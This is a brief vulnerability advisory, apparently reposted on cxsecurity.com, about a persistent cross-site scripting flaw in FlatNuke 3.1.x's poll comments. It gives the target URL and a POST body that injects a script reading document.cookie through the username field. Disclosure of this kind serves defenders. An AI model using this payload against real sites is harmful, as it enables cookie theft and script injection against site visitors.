FlatNuke 3.1.x Cross Site Scripting

2014.11.18
Credit: Juri Gianni
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

------------------------------------------------------------------------- [+] FlatNuke <= 3.1.x (FlatPoll) Persistent XSS Vulnerability ------------------------------------------------------------------------- [*] Discovered by Juri Gianni - Turin,Italy [*] staker - staker[at]hotmail[dot]it / shrod9[at]gmail[dot]com [*] Discovered on 13/11/2014 [*] Site Vendor: http://www.flatnuke.org [*] Category: WebApp [*] BUG: PERSISTENT XSS ----------------------------------------------------------------------------------------------- [+] http://localhost/flatnuke/index.php?mod=none_Sondaggio [+] Modify the POST content ------------------------------------------------------------------------------------------------ [-] writecomm=writecomm&by=[ANY USERNAME][XSS]&body=This is my comment [-] writecomm=writecomm&by=ADMIN<script>alert(document.cookie)</script>&body=This is my comment ------------------------------------------------------------------------------------------------


See this note in RAW Version
Vote for this issue:
50%
50%

Comment it here.
Copyright 2025, cxsecurity.com

 

Back to Top